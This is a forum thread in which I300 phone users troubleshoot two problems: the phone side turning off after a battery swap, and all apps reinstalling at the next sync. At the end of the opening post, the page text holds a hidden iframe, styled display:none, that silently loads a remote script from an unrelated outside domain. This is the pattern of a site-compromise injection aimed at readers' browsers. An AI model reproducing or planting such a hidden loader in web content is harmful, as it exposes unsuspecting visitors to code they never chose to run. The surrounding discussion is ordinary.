I've noticed two behaviors with the I300 that I'm wondering if anyone else experiences:
1) Everytime I switch batteries, the phone side of the machine is off after I install the charged up battery. I read through several threads but I couldn't ascertain whether this is the right behavior or is this a fault? You would think that just switching batteries (quickly) shouldn't change any behavior or setting on the phone or Palm.
2) After changing batteries and turning on the phone, the I300 behaves normally. No data loss or anything. However, at the next sync, all my apps are downloaded and reinstalled. It's like the Palm side thinks it lost all the applications because of a battery drain although the apps are there and there was no data loss.
Anyone see similar behavior?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

1) The phone does default to off when you swap batteries. I assume the reasoning behind this is to err on the side of longer battery life.
2) Haven't noticed this on my phone. Did you change your profile name on either the computer or i300? have you had other profiles installed on either? it sounds like something's causing your profile name to change, which would cause apps to re-install...
Also, I assume that during normal synch (before you swap batteries), you don't get the apps reinstalled.
Prior to switching batteries, whenever I did a sync, no apps were reinstalled. However, after switching batteries, they are all reinstalled. In fact this has happened three times. In no case did I did change any profiles on either the phone or my computer.
I usually turn the phone off, then turn the screen off before I change batteries. It just seems safer that way and if you think about the old stand alone phone it made sense to turn it off before pulling the battery out.
Both issues I'm having have started from the get go. After removing the battery and putting on a new battery, the phone side is off and has to be returned on.
And, my applications have reinstalled automatically at least three times although I'm now not sure if the reinstall is related to the battery change or not. Another symptom is that the reinstall of all the applications has occurred on three successive Mondays! In any event, what would cause all the apps to reinstall? My desktop is Mac version 2.6.3.
however, i dont have MAC so i cant really comment, but if its only doing it on certain days of the week.. sounds like some kind of app you have installed.... have you tried to do a sync without changing batteries first to see if that makes a difference?
